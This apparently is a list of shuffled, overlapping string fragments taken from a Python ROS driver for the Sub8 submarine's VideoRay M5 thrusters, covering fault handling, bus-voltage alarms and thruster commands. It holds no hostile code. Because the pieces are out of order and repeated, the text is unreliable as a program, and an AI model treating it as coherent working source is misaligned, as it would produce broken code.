"load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects ''' self.ports = {}",
"thruster ''' self.failed_thrusters = set() # This is only determined by comms self.deactivated_thrusters",
"def add_reading(self, voltage, time): ''' Adds voltage readings to buffer ''' voltage =",
"in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online #",
"thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0])",
"self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper blocks until it can use",
"will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters",
"''' self.failed_thrusters = set() # This is only determined by comms self.deactivated_thrusters =",
"2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4): 'STALL', (1 << 5):",
"{x for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise",
"'STALL_WARN', } fault = int(message_keyword_args['fault']) faults = [] for code, fault_name in fault_codes.items():",
"- self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than the",
"python import numpy as np import copy import rospy import rospkg import rosparam",
"thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not np.isclose(thrust, 0):",
"= rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for",
"simple rolling average with a constant width sliding window. However add_reading and get_estimate",
"status is bad if thruster_status is None: return message_contents = [ 'rpm', 'bus_v',",
"self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create ThrusterPort",
"False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based on parameter '/simulate'\") #",
"self.prune_buffer() # check bus voltage if enough time has passed if rospy.Time.now() -",
"= AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create ThrusterPort objects",
"(clipped at 5) ''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME,",
"- Gather configuration data and make it available to other nodes - Instantiate",
"= (rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified",
"dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper",
"'/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path))",
"srv): ''' Makes a thruster unavailable for thrust allocation ''' # So that",
"thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) #",
"')') effort = target_port.thruster_info[name].get_effort_from_thrust(thrust) # We immediately get thruster_status back thruster_status = target_port.command_thruster(name,",
"self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if enough time has passed",
"''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None",
"dict and configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if",
"file containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:])",
"smarter filtering is needed ''' VMAX = 50 # volts VMIN = 0",
"status of the particular thruster ''' self.failed_thrusters = set() # This is only",
"add_reading(self, voltage, time): ''' Adds voltage readings to buffer ''' voltage = float(voltage)",
"thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it won't",
"rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to all thrusters",
"is bad if thruster_status is None: return message_contents = [ 'rpm', 'bus_v', 'bus_i',",
"import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster,",
"queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms require this service to be",
"'__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5 thrusters\" desc_msg",
"def stop(self): ''' Commands 0 thrust to all thrusters ''' for port in",
"# Will publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt",
"if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not still be",
"Sets the severity to the number of failed thrusters (clipped at 5) '''",
"port_info in ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add",
"import threading import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64",
"copy import rospy import rospkg import rosparam import threading import argparse from geometry_msgs.msg",
"sub8's thruster bus voltage. As of May 2017, this is just a simple",
"to be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor",
"# Add the thrusters to the thruster dict and configure if present for",
"a list of instructions, one for each thruster If there are any updates",
"voltage, time): self.v = voltage self.t = time def __init__(self, window_duration): ''' window_duration",
"check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises alarm if necessary ''' bus_voltage =",
"self.t = time def __init__(self, window_duration): ''' window_duration - float (amount of seconds",
"commanding all of the sub's thrusters - Gather configuration data and make it",
"self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will",
"Only add if it makes sense (the M5's will give nonsense feedback at",
">= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage",
"in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't try to do anything",
"faults = [] for code, fault_name in fault_codes.items(): if code & fault !=",
"are BLR, FLH, etc. Raises RuntimeError if a thrust value outside of the",
"the configuration.json file containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args",
"= rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster',",
"''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if __name__ == '__main__': PKG = 'sub8_videoray_m5_thruster'",
"= {x for x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) #",
"''' window_duration - float (amount of seconds for which to keep a reading",
"named thruster Example names are BLR, FLH, etc. Raises RuntimeError if a thrust",
"not in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online",
"self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust",
"thruster names to the appropriate port - Given a command message, route that",
"won't come back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that",
"M5 thrusters\" desc_msg = \"Specify a path to the configuration.json file containing the",
"non-zero thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if",
"and make it available to other nodes - Instantiate ThrusterPorts, (Either simulated or",
"alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): '''",
"for offline in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went",
"} fault = int(message_keyword_args['fault']) faults = [] for code, fault_name in fault_codes.items(): if",
"# volts VMIN = 0 # volts class VoltageReading(object): def __init__(self, voltage, time):",
"severity = None if bus_voltage < self.warn_voltage: severity = 3 if bus_voltage <",
"(1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 << 4): 'STALL', (1",
"entered fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self,",
"thruster bus voltage. As of May 2017, this is just a simple rolling",
"= self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]:",
"not still be true - David) if message_keyword_args['fault'] > 2: fault_codes = {",
"get_thruster_info(self, srv): ''' Get the thruster info for a particular thruster name '''",
"info for a particular thruster name ''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name]",
"= severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration = 30.0 #",
"__name__ == '__main__': PKG = 'sub8_videoray_m5_thruster' usage_msg = \"Interface to Sub8's VideoRay M5",
"node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running",
"take effect def get_thruster_info(self, srv): ''' Get the thruster info for a particular",
"are any updates to the list of failed thrusters, it will raise and",
"do anything if the thruster status is bad if thruster_status is None: return",
"return None for r in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes",
"determined by comms self.deactivated_thrusters = set() # These will not come back online",
"- reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage",
"self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried",
"necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity =",
"settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary for some settings",
"self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if enough time has passed if",
"programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster)",
"thrusters (thruster mapper blocks until it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info',",
"are left for when smarter filtering is needed ''' VMAX = 50 #",
"the thrusters to the thruster dict and configure if present for thruster_name in",
"= srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction)",
"thrust): ''' Issue a a force command (in Newtons) to a named thruster",
"to Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify a path to the configuration.json",
"if len(self.buffer) == 0: return None for r in self.buffer: voltages.append(r.v) return np.mean(voltages)",
"failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't try to",
"<= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus voltage if enough time has",
"44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0",
"# ThrusterPort objects self.thruster_to_port_map = {} # node_id to ThrusterPort rospack = rospkg.RosPack()",
"older than the window_duration from buffer ''' for reading in self.buffer: age =",
"etc. Raises RuntimeError if a thrust value outside of the configured thrust bounds",
"# Set firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path = (rospack.get_path('sub8_videoray_m5_thruster')",
"Track a thrust_dict, which maps thruster names to the appropriate port - Given",
"window. However add_reading and get_estimate methods are left for when smarter filtering is",
"3): 'OVERTEMP', (1 << 4): 'STALL', (1 << 5): 'STALL_WARN', } fault =",
"for name in self.thruster_to_port_map.keys()} # These alarms require this service to be available",
"queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION",
"thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter =",
"thrust_cb(self, msg): ''' Callback for receiving thrust commands These messages contain a list",
"<< 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults = [] for code, fault_name",
"self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self,",
"self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to all thrusters ''' for",
"self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self): ''' Removes readings older than the window_duration from buffer",
"self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage",
"= set() # This is only determined by comms self.deactivated_thrusters = set() #",
"comms are good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False)",
"[] def add_reading(self, voltage, time): ''' Adds voltage readings to buffer ''' voltage",
"seconds for which to keep a reading in the buffer) ''' self.bus_voltage_alarm =",
"Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point",
"''' for reading in self.buffer: age = rospy.Time.now() - reading.t if age >",
"it available to other nodes - Instantiate ThrusterPorts, (Either simulated or real), for",
"enough time has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def prune_buffer(self):",
"name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()} # These alarms require this service",
"rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average",
"\"Specify a path to the configuration.json file containing the thrust calibration data\" parser",
"# node_id to ThrusterPort rospack = rospkg.RosPack() self.make_fake = rospy.get_param('simulate', False) if self.make_fake:",
"or clear 'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm()",
"Instantiate ThrusterPorts, (Either simulated or real), for communicating with thrusters - Track a",
"__init__(self, window_duration): ''' window_duration - float (amount of seconds for which to keep",
"work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub",
"= None if bus_voltage < self.warn_voltage: severity = 3 if bus_voltage < self.kill_voltage:",
"''' for port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self,",
"until it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers =",
"alarm Updates the 'offline_thruster_names' parameter accordingly Sets the severity to the number of",
"fake=self.make_fake) # Add the thrusters to the thruster dict and configure if present",
"if name in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to",
"ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) ) # Will publish",
"still be true - David) if message_keyword_args['fault'] > 2: fault_codes = { (1",
"Send a thruster status message describing the status of the particular thruster '''",
"= parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout",
"- Send a thruster status message describing the status of the particular thruster",
"# Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate",
"and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage},",
"thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero",
"severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity",
"<< 1): 'OVERRVOLT', (1 << 2): 'OVERCURRENT', (1 << 3): 'OVERTEMP', (1 <<",
"(1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults = [] for code,",
"'.yaml') rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) #",
"ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position), direction=Vector3(*info.direction) ) return thruster_info def check_alarm_status(self, alarm): #",
"make sure to raise it again if not alarm.raised and alarm.node_name != self._NODE_NAME:",
"# Instantiate thruster comms port for port_info in ports_layout: port_name = port_info['port'] self.ports[port_name]",
"settings to take effect def get_thruster_info(self, srv): ''' Get the thruster info for",
"= wait_for_param(layout_parameter) if thruster_layout is None: raise IOError('/thruster_layout rosparam needs to be set",
"self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based on parameter '/simulate'\") # Instantiate thruster",
"not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't try to do",
"ports_layout: port_name = port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters",
"'/simulate'\") # Instantiate thruster comms port for port_info in ports_layout: port_name = port_info['port']",
"dictionary ThrusterPort objects ''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map = {}",
"= rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns",
"# Don't try to do anything if the thruster status is bad if",
"bounds is commanded Raises UnavailableThrusterException if a thruster that is offline is commanded",
"port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on thrusters (thruster mapper blocks until it",
"IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name]",
"causes are: {}\".format(faults)) return def thrust_cb(self, msg): ''' Callback for receiving thrust commands",
"Publishes bus_voltage estimate and raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if",
"which maps thruster names to the appropriate port - Given a command message,",
"Issue a a force command (in Newtons) to a named thruster Example names",
"= rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer =",
"online or offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not",
"add_reading and get_estimate methods are left for when smarter filtering is needed '''",
"def __init__(self, ports_layout, thruster_definitions): '''Thruster driver, an object for commanding all of the",
"fake thrusters for simulation, based on parameter '/simulate'\") # Instantiate thruster comms port",
"outside of the configured thrust bounds is commanded Raises UnavailableThrusterException if a thruster",
"severity is not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen",
"and failed not in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster",
"thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if not",
"any updates to the list of failed thrusters, it will raise and alarm",
"if message_keyword_args['fault'] > 2: fault_codes = { (1 << 0): 'UNDERVOLT', (1 <<",
"from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object): ''' Class that",
"(in Newtons) to a named thruster Example names are BLR, FLH, etc. Raises",
"not come back online even if comms are good (user managed) # Alarms",
"Necessary for some settings to take effect def get_thruster_info(self, srv): ''' Get the",
"import rospkg import rosparam import threading import argparse from geometry_msgs.msg import Vector3 from",
"50 # volts VMIN = 0 # volts class VoltageReading(object): def __init__(self, voltage,",
"def update_thruster_out_alarm(self): ''' Raises or clears the thruster out alarm Updates the 'offline_thruster_names'",
"thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory",
"target_port.get_declared_thruster_names() and failed not in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) #",
"query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1], position=numpy_to_point(info.position),",
"the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage =",
"self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def unfail_thruster(self,",
"# These alarms require this service to be available before things will work",
"Raises UnavailableThrusterException if a thruster that is offline is commanded a non-zero thrust",
"Undervolt/overvolt faults are unreliable (might not still be true - David) if message_keyword_args['fault']",
"sub8_thruster_comm import thruster_comm_factory from ros_alarms import AlarmBroadcaster, AlarmListener lock = threading.Lock() class BusVoltageMonitor(object):",
"== 0: return None for r in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self):",
"Driver waiting for parameter, {}\".format(layout_parameter)) thruster_layout = wait_for_param(layout_parameter) if thruster_layout is None: raise",
"needs to be set before launching the thruster driver') thruster_driver = ThrusterDriver(thruster_layout['thruster_ports'], thruster_layout['thrusters'])",
"from geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg import Thrust,",
"add if it makes sense (the M5's will give nonsense feedback at times)",
"voltage >= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check bus",
"maps thruster names to the appropriate port - Given a command message, route",
"offline in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline",
"failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed not in offline_on_port and",
"voltage if enough time has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage()",
"- float (amount of seconds for which to keep a reading in the",
"for which to keep a reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\")",
"available to other nodes - Instantiate ThrusterPorts, (Either simulated or real), for communicating",
"thrust_cmd.thrust) # Raise or clear 'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed",
"severity class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration = 30.0 # s",
"= rospy.Duration(0.2) self.cached_severity = 0 self.buffer = [] def add_reading(self, voltage, time): '''",
"thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes a thruster unavailable",
"good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {} def",
"thrust ''' port_name = self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust",
"Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters",
"come back online even if comms are good (user managed) # Alarms self.thruster_out_alarm",
"thruster dict and configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port']",
"BusVoltageMonitor(object): ''' Class that estimates sub8's thruster bus voltage. As of May 2017,",
"numpy as np import copy import rospy import rospkg import rosparam import threading",
"of failed thrusters, it will raise and alarm ''' failed_before = {x for",
"= [] if len(self.buffer) == 0: return None for r in self.buffer: voltages.append(r.v)",
"= {key: thruster_status[key] for key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish(",
"(rospack.get_path('sub8_videoray_m5_thruster') + '/config/firmware_settings/' + thruster_name + '.yaml') rospy.loginfo('Configuring {} with settings specified in",
"offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not in self.failed_thrusters:",
"that thrust is not allocated to the thruster self.failed_thrusters.add(srv.thruster_name) # So that it",
"self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in buffer ''' voltages = []",
"thrusters - Track a thrust_dict, which maps thruster names to the appropriate port",
"alarms require this service to be available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm()",
"# So that it won't come back online even if comms are good",
"an object for commanding all of the sub's thrusters - Gather configuration data",
"update_thruster_out_alarm(self): ''' Raises or clears the thruster out alarm Updates the 'offline_thruster_names' parameter",
"rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD",
"failed not in offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came",
"it again if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def update_thruster_out_alarm(self): '''",
"voltage = float(voltage) # Only add if it makes sense (the M5's will",
"port in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): '''",
"to other nodes - Instantiate ThrusterPorts, (Either simulated or real), for communicating with",
"= time def __init__(self, window_duration): ''' window_duration - float (amount of seconds for",
"to raise it again if not alarm.raised and alarm.node_name != self._NODE_NAME: self.update_thruster_out_alarm() def",
"is only determined by comms self.deactivated_thrusters = set() # These will not come",
"path to the configuration.json file containing the thrust calibration data\" parser = argparse.ArgumentParser(usage=usage_msg,",
"rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time =",
"average voltage in buffer ''' voltages = [] if len(self.buffer) == 0: return",
"names are BLR, FLH, etc. Raises RuntimeError if a thrust value outside of",
"on parameter '/simulate'\") # Instantiate thruster comms port for port_info in ports_layout: port_name",
"Callback for receiving thrust commands These messages contain a list of instructions, one",
"import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg import Header, Float64 from sub8_msgs.msg",
"{} def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm()",
"severity = 3 if bus_voltage < self.kill_voltage: severity = 5 if severity is",
"reading in self.buffer: age = rospy.Time.now() - reading.t if age > self.WINDOW_DURATION: self.buffer.remove(reading)",
"for when smarter filtering is needed ''' VMAX = 50 # volts VMIN",
"comms self.deactivated_thrusters = set() # These will not come back online even if",
"@thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads a dictionary ThrusterPort objects ''' self.ports",
"thruster status message describing the status of the particular thruster ''' self.failed_thrusters =",
"len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME,",
"= thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args",
"self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10) for name in self.thruster_to_port_map.keys()}",
"else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a",
"''' Publishes bus_voltage estimate and raises alarm if necessary ''' bus_voltage = self.get_voltage_estimate()",
"a thruster status message describing the status of the particular thruster ''' self.failed_thrusters",
"rospy.loginfo('Configuring {} with settings specified in {}.'.format(thruster_name, config_path)) port.set_registers_from_dict(node_id=node_id, reg_dict=rosparam.load_file(config_path)[0][0]) port.reboot_thruster(node_id) # Necessary",
"sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms import",
"target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster",
"for each thruster If there are any updates to the list of failed",
"route that command to the appropriate port/thruster - Send a thruster status message",
